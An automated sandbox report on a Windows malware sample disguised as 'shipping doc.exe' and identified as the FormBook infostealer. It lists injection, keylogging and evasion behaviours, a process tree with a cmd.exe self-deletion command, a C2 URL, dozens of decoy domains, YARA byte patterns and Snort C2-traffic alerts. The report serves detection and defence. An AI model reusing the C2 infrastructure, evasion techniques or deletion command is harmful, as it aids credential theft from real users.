Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
shipping doc.exe

Overview

General Information

Sample name:shipping doc.exe
Analysis ID:1435937
MD5:7ad4c6133f4f75ae91bf07f65dc5f21a
SHA1:abab0fed5f43a2ee988fb45b8880d50292dc9d5f
SHA256:9aeee1a70ae929e15e376532efa734d1a7dd5c0b0c814c3e620dcfe68e7baa96
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • shipping doc.exe (PID: 2932 cmdline: "C:\Users\user\Desktop\shipping doc.exe" MD5: 7AD4C6133F4F75AE91BF07F65DC5F21A)
    • svchost.exe (PID: 3804 cmdline: "C:\Users\user\Desktop\shipping doc.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • help.exe (PID: 8076 cmdline: "C:\Windows\SysWOW64\help.exe" MD5: DD40774E56D4C44B81F2DFA059285E75)
          • cmd.exe (PID: 6528 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chrome.exe (PID: 7344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1988 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:2 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2548 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-nacl --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --time-ticks-at-unix-epoch=-1714734611839441 --launch-time-ticks=182597864 --mojo-platform-channel-handle=3040 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-nacl --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --time-ticks-at-unix-epoch=-1714734611839441 --launch-time-ticks=182602404 --mojo-platform-channel-handle=3016 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7588 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --disable-nacl --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --time-ticks-at-unix-epoch=-1714734611839441 --launch-time-ticks=182837962 --mojo-platform-channel-handle=4392 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-nacl --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --time-ticks-at-unix-epoch=-1714734611839441 --launch-time-ticks=183415711 --mojo-platform-channel-handle=4880 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 3744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"C2 list": ["www.steam.help/ba94/"], "decoy": ["dxtra.shop", "upfromhere-eventsdecor.com", "blacksevenkoeln.shop", "pcboards2024.xyz", "posteo.lol", "naservus.com", "pivotance.com", "90ans.com", "ebenezer-remodeling.com", "reddragondao.com", "gspotshop.com", "thesiamesebetta.biz", "rrdhq.com", "greenislandservices.info", "prismotrov.com", "elaqbh.shop", "sosenfantscovidlong.com", "elmsolarsavings.com", "sol-casino-2023.club", "sharecroipper.top", "yqwija.info", "eat-smile.com", "idj257.com", "popenza.com", "bingpueng.website", "odty744.net", "ooqowerh.com", "primetechinnovationllc.com", "themvpcatalyst.us", "spesandosupermercato.com", "arwile.com", "pachecoarquitectos.com", "csrhzs.com", "citylinechimneythorntonpa.us", "apocalypticsigil.us", "shareebrooksphotography.com", "hjgd.xyz", "vertexoffice.com", "xn--vf4b25j89a162a.com", "fijula.com", "odvip666.bet", "sekutvk5ks.top", "creditscorewizards.com", "happyjon.com", "18plusmovies.com", "xn--vr-jc9iv7k9yrlb465i.net", "saga-launchs.app", "liyinghao.cc", "binpc6.club", "schatzaviation.com", "employeefeedback.link", "whatpixels.com", "humidityflash.site", "seraph.live", "6lsamr.vip", "hmi29.top", "galaxyprofituk.com", "educationman.me", "heelfixkit.com", "jacobmcfarland.dev", "kso032.com", "fdue.store", "yourreicapital.com", "ac6a2qa.cc"]}
SourceRuleDescriptionAuthorStrings
00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 17 entries
      SourceRuleDescriptionAuthorStrings
      0.2.shipping doc.exe.20d0000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.shipping doc.exe.20d0000.1.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0.2.shipping doc.exe.20d0000.1.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          0.2.shipping doc.exe.20d0000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.shipping doc.exe.20d0000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a39:$sqlite3step: 68 34 1C 7B E1
          • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a68:$sqlite3text: 68 38 2A 90 C5
          • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\shipping doc.exe", CommandLine: "C:\Users\user\Desktop\shipping doc.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\shipping doc.exe", ParentImage: C:\Users\user\Desktop\shipping doc.exe, ParentProcessId: 2932, ParentProcessName: shipping doc.exe, ProcessCommandLine: "C:\Users\user\Desktop\shipping doc.exe", ProcessId: 3804, ProcessName: svchost.exe
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\shipping doc.exe", CommandLine: "C:\Users\user\Desktop\shipping doc.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\shipping doc.exe", ParentImage: C:\Users\user\Desktop\shipping doc.exe, ParentProcessId: 2932, ParentProcessName: shipping doc.exe, ProcessCommandLine: "C:\Users\user\Desktop\shipping doc.exe", ProcessId: 3804, ProcessName: svchost.exe
          Timestamp:05/03/24-13:21:55.842360
          SID:2031412
          Source Port:49775
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:17:09.040524
          SID:2031412
          Source Port:49767
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:15:40.646435
          SID:2031412
          Source Port:49763
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:21:15.044041
          SID:2031412
          Source Port:49773
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:16:02.495913
          SID:2031412
          Source Port:49764
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:20:54.448926
          SID:2031412
          Source Port:49772
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:15:18.562499
          SID:2031412
          Source Port:49762
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:18:53.201198
          SID:2031412
          Source Port:49770
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:22:16.535005
          SID:2031412
          Source Port:49776
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:14:56.862627
          SID:2031412
          Source Port:49761
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:19:52.944033
          SID:2031412
          Source Port:49771
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:16:25.590027
          SID:2031412
          Source Port:49765
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:16:47.256119
          SID:2031412
          Source Port:49766
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:21:35.663952
          SID:2031412
          Source Port:49774
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/03/24-13:17:49.792172
          SID:2031412
          Source Port:49768
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://www.steam.help/ba94/www.galaxyprofituk.comAvira URL Cloud: Label: phishing
          Source: http://www.posteo.lol/ba94/Avira URL Cloud: Label: malware
          Source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.steam.help/ba94/"], "decoy": ["dxtra.shop", "upfromhere-eventsdecor.com", "blacksevenkoeln.shop", "pcboards2024.xyz", "posteo.lol", "naservus.com", "pivotance.com", "90ans.com", "ebenezer-remodeling.com", "reddragondao.com", "gspotshop.com", "thesiamesebetta.biz", "rrdhq.com", "greenislandservices.info", "prismotrov.com", "elaqbh.shop", "sosenfantscovidlong.com", "elmsolarsavings.com", "sol-casino-2023.club", "sharecroipper.top", "yqwija.info", "eat-smile.com", "idj257.com", "popenza.com", "bingpueng.website", "odty744.net", "ooqowerh.com", "primetechinnovationllc.com", "themvpcatalyst.us", "spesandosupermercato.com", "arwile.com", "pachecoarquitectos.com", "csrhzs.com", "citylinechimneythorntonpa.us", "apocalypticsigil.us", "shareebrooksphotography.com", "hjgd.xyz", "vertexoffice.com", "xn--vf4b25j89a162a.com", "fijula.com", "odvip666.bet", "sekutvk5ks.top", "creditscorewizards.com", "happyjon.com", "18plusmovies.com", "xn--vr-jc9iv7k9yrlb465i.net", "saga-launchs.app", "liyinghao.cc", "binpc6.club", "schatzaviation.com", "employeefeedback.link", "whatpixels.com", "humidityflash.site", "seraph.live", "6lsamr.vip", "hmi29.top", "galaxyprofituk.com", "educationman.me", "heelfixkit.com", "jacobmcfarland.dev", "kso032.com", "fdue.store", "yourreicapital.com", "ac6a2qa.cc"]}
          Source: www.steam.helpVirustotal: Detection: 5%Perma Link
          Source: shipping doc.exeReversingLabs: Detection: 52%
          Source: shipping doc.exeVirustotal: Detection: 55%Perma Link
          Source: Yara matchFile source: 0.2.shipping doc.exe.20d0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.shipping doc.exe.20d0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: shipping doc.exeJoe Sandbox ML: detected
          Source: shipping doc.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49755 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49757 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.46.162.224:443 -> 192.168.2.4:49769 version: TLS 1.2
          Source: Binary string: wntdll.pdbUGP source: shipping doc.exe, 00000000.00000003.1778277441.00000000042E0000.00000004.00001000.00020000.00000000.sdmp, shipping doc.exe, 00000000.00000003.1778898158.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1896083913.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1779871124.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1896083913.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1781630445.0000000003800000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1900597233.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1894984322.00000000029A3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: shipping doc.exe, 00000000.00000003.1778277441.00000000042E0000.00000004.00001000.00020000.00000000.sdmp, shipping doc.exe, 00000000.00000003.1778898158.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1896083913.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1779871124.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1896083913.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1781630445.0000000003800000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1900597233.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1894984322.00000000029A3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: help.pdbGCTL source: svchost.exe, 00000001.00000002.1895405564.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1895424244.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898409184.0000000003D80000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: chrome.exe, 0000000C.00000000.2014617477.0000000033F6F000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 0000000D.00000000.2099344946.0000000022D1F000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 0000000E.00000000.2161914269.0000000014DBF000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 0000000F.00000000.2221158494.00000000125DF000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 00000010.00000000.2286828425.000000002657F000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 00000011.00000000.2347747516.00000000256CF000.00000004.00000001.00040000.00000000.sdmp
          Source: Binary string: help.pdb source: svchost.exe, 00000001.00000002.1895405564.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1895424244.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898409184.0000000003D80000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: chrome.exe, 0000000C.00000000.2014617477.0000000033F6F000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 0000000D.00000000.2099344946.0000000022D1F000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 0000000E.00000000.2161914269.0000000014DBF000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 0000000F.00000000.2221158494.00000000125DF000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 00000010.00000000.2286828425.000000002657F000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 00000011.00000000.2347747516.00000000256CF000.00000004.00000001.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0014DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0014DBBE
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001568EE FindFirstFileW,FindClose,0_2_001568EE
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0015698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0015698F
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0014D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0014D076
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0014D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0014D3A9
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00159642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00159642
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0015979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0015979D
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00159B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00159B2B
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00155C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00155C97

          Networking

          barindex
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 91.195.240.117:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 185.199.110.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 45.43.211.76:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 81.88.63.46:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 87.236.19.19:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 185.215.4.42:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 91.195.240.19:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 199.59.243.225:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 199.15.163.139:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 81.19.154.98:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 203.161.58.65:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49773 -> 81.19.154.98:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 89.117.27.198:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49775 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 103.224.212.217:80
          Source: Malware configuration extractorURLs: www.steam.help/ba94/
          Source: DNS query: www.hjgd.xyz
